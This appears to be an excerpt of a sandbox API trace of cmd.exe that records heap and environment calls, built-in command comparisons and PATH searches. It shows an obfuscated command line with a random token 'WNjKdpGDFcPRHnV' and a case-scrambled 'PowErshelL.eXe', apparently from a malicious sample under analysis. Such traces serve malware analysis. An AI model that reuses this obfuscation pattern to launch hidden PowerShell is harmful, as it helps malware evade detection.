	[0071.355] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0071.355] GetProcessHeap () returned 0x450000
	[0071.355] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4649a0 | out: hHeap=0x450000) returned 1
	[0071.355] GetProcessHeap () returned 0x450000
	[0071.355] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x470670 | out: hHeap=0x450000) returned 1
	[0071.356] GetProcessHeap () returned 0x450000
	[0071.356] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4010) returned 0x470670
	[0071.356] GetProcessHeap () returned 0x450000
	[0071.356] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1a) returned 0x4649a0
	[0071.356] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0071.356] GetProcessHeap () returned 0x450000
	[0071.356] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4649a0 | out: hHeap=0x450000) returned 1
	[0071.356] GetProcessHeap () returned 0x450000
	[0071.356] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x470670 | out: hHeap=0x450000) returned 1
	[0071.356] GetProcessHeap () returned 0x450000
	[0071.356] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46c650 | out: hHeap=0x450000) returned 1
	[0071.357] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0071.357] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0071.357] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0071.357] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0071.357] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0071.357] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0071.357] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0071.357] GetProcessHeap () returned 0x450000
	[0071.357] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb0) returned 0x46a180
	[0071.357] GetProcessHeap () returned 0x450000
	[0071.357] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x4669a0
	[0071.357] GetProcessHeap () returned 0x450000
	[0071.357] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x14) returned 0x468d80
	[0071.444] GetProcessHeap () returned 0x450000
	[0071.444] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb0) returned 0x46a240
	[0071.445] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0071.445] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0071.445] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0071.445] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0071.445] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0071.445] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0071.445] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0071.445] GetProcessHeap () returned 0x450000
	[0071.445] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb0) returned 0x46a300
	[0071.445] GetProcessHeap () returned 0x450000
	[0071.445] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2e) returned 0x4669e0
	[0071.450] GetConsoleTitleW (in: lpConsoleTitle=0x25f6c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DIR") returned 19
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ERASE") returned 18
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DEL") returned 19
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TYPE") returned 3
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COPY") returned 20
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CD") returned 20
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CHDIR") returned 20
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RENAME") returned 5
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REN") returned 5
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ECHO") returned 18
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SET") returned 4
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PAUSE") returned 7
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DATE") returned 19
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TIME") returned 3
	[0071.451] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PROMPT") returned 7
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MD") returned 10
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKDIR") returned 10
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RD") returned 5
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RMDIR") returned 5
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PATH") returned 7
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="GOTO") returned 16
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SHIFT") returned 4
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CLS") returned 20
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CALL") returned 20
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VERIFY") returned 1
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VER") returned 1
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VOL") returned 1
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="EXIT") returned 18
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SETLOCAL") returned 4
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ENDLOCAL") returned 18
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TITLE") returned 3
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="START") returned 4
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DPATH") returned 19
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="KEYS") returned 12
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MOVE") returned 10
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PUSHD") returned 7
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="POPD") returned 7
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ASSOC") returned 22
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FTYPE") returned 17
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="BREAK") returned 21
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COLOR") returned 20
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKLINK") returned 10
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DIR") returned 19
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ERASE") returned 18
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DEL") returned 19
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TYPE") returned 3
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COPY") returned 20
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CD") returned 20
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CHDIR") returned 20
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RENAME") returned 5
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REN") returned 5
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ECHO") returned 18
	[0071.452] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SET") returned 4
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PAUSE") returned 7
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DATE") returned 19
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TIME") returned 3
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PROMPT") returned 7
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MD") returned 10
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKDIR") returned 10
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RD") returned 5
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RMDIR") returned 5
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PATH") returned 7
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="GOTO") returned 16
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SHIFT") returned 4
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CLS") returned 20
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CALL") returned 20
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VERIFY") returned 1
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VER") returned 1
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VOL") returned 1
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="EXIT") returned 18
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SETLOCAL") returned 4
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ENDLOCAL") returned 18
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TITLE") returned 3
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="START") returned 4
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DPATH") returned 19
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="KEYS") returned 12
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MOVE") returned 10
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PUSHD") returned 7
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="POPD") returned 7
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ASSOC") returned 22
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FTYPE") returned 17
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="BREAK") returned 21
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COLOR") returned 20
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKLINK") returned 10
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FOR") returned 17
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="IF") returned 14
	[0071.453] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REM") returned 5
	[0071.454] GetProcessHeap () returned 0x450000
	[0071.454] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x218) returned 0x451800
	[0071.454] GetProcessHeap () returned 0x450000
	[0071.454] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x34) returned 0x466a60
	[0071.454] _wcsnicmp (_String1="WNjK", _String2="cmd ", _MaxCount=0x4) returned 20
	[0071.455] GetProcessHeap () returned 0x450000
	[0071.455] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x420) returned 0x46afd0
	[0071.455] SetErrorMode (uMode=0x0) returned 0x0
	[0071.455] SetErrorMode (uMode=0x1) returned 0x0
	[0071.455] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46afe0, lpFilePart=0x25ef50 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x25ef50*="Documents") returned 0x1b
	[0071.455] SetErrorMode (uMode=0x0) returned 0x1
	[0071.455] GetProcessHeap () returned 0x450000
	[0071.455] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x46afd0, Size=0x68) returned 0x46afd0
	[0071.455] GetProcessHeap () returned 0x450000
	[0071.455] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x46afd0) returned 0x68
	[0071.455] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0071.455] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0071.455] GetProcessHeap () returned 0x450000
	[0071.455] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x170) returned 0x451a20
	[0071.455] GetProcessHeap () returned 0x450000
	[0071.455] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2d0) returned 0x46b050
	[0071.460] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x46b050, Size=0x172) returned 0x46b050
	[0071.460] GetProcessHeap () returned 0x450000
	[0071.460] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x46b050) returned 0x172
	[0071.460] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0071.460] GetProcessHeap () returned 0x450000
	[0071.460] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe8) returned 0x451ba0
	[0071.460] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x451ba0, Size=0x7e) returned 0x451ba0
	[0071.460] GetProcessHeap () returned 0x450000
	[0071.461] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x451ba0) returned 0x7e
	[0071.461] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0071.462] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x25ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ecc0) returned 0xffffffffffffffff
	[0071.462] GetLastError () returned 0x2
	[0071.462] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x25ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ecc0) returned 0xffffffffffffffff
	[0071.463] GetLastError () returned 0x2
	[0071.463] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0071.463] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x25ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ecc0) returned 0xffffffffffffffff
	[0071.464] GetLastError () returned 0x2
	[0071.464] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x25ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ecc0) returned 0xffffffffffffffff
	[0071.464] GetLastError () returned 0x2
	[0071.464] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0071.465] FindFirstFileExW (in: lpFileName="C:\\Windows\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x25ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ecc0) returned 0xffffffffffffffff
	[0071.465] GetLastError () returned 0x2
	[0071.465] FindFirstFileExW (in: lpFileName="C:\\Windows\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x25ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ecc0) returned 0xffffffffffffffff
	[0071.465] GetLastError () returned 0x2
	[0071.466] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0071.466] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x25ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ecc0) returned 0xffffffffffffffff
	[0071.466] GetLastError () returned 0x2
	[0071.467] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x25ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ecc0) returned 0xffffffffffffffff
	[0071.467] GetLastError () returned 0x2
	[0071.467] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0071.468] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x25ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ecc0) returned 0xffffffffffffffff
	[0071.468] GetLastError () returned 0x2
	[0071.468] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x25ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ecc0) returned 0xffffffffffffffff
	[0071.468] GetLastError () returned 0x2
	[0071.469] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0071.469] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x25ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ecc0) returned 0xffffffffffffffff
	[0071.470] GetLastError () returned 0x2
	[0071.470] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x25ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ecc0) returned 0xffffffffffffffff
	[0071.472] GetLastError () returned 0x2
	[0071.472] _get_osfhandle (_FileHandle=2) returned 0xb
	[0071.472] GetFileType (hFile=0xb) returned 0x2
	[0071.472] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0071.472] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x25f118 | out: lpMode=0x25f118) returned 1
	[0071.473] _get_osfhandle (_FileHandle=2) returned 0xb
	[0071.473] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x25f150 | out: lpConsoleScreenBufferInfo=0x25f150) returned 1
	[0071.473] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0071.474] GetConsoleTitleW (in: lpConsoleTitle=0x25f600, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0071.474] GetFileAttributesW (lpFileName="PowErshelL.eXe" (normalized: "c:\\users\\aetadzjz\\documents\\powershell.exe")) returned 0xffffffff
	[0071.474] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0071.474] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0071.474] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0071.474] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0071.474] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0071.475] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0071.476] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0071.477] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0071.477] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0071.477] _wcsicmp (_String1="PowErshelL", _String2="FOR") returned 10
	[0071.477] _wcsicmp (_String1="PowErshelL", _String2="IF") returned 7
	[0071.477] _wcsicmp (_String1="PowErshelL", _String2="REM") returned -2
	[0071.477] SetErrorMode (uMode=0x0) returned 0x0
	[0071.477] SetErrorMode (uMode=0x1) returned 0x0
	[0071.477] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46b640, lpFilePart=0x25ee90 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x25ee90*="Documents") returned 0x1b
	[0071.477] SetErrorMode (uMode=0x0) returned 0x1
	[0071.477] GetProcessHeap () returned 0x450000
	[0071.477] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x46b630, Size=0x66) returned 0x46b630
	[0071.477] GetProcessHeap () returned 0x450000
	[0071.477] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x46b630) returned 0x66
	[0071.477] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0071.477] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0071.477] GetProcessHeap () returned 0x450000
	[0071.477] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x170) returned 0x451c30
	[0071.477] GetProcessHeap () returned 0x450000
	[0071.477] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2d0) returned 0x46b6b0
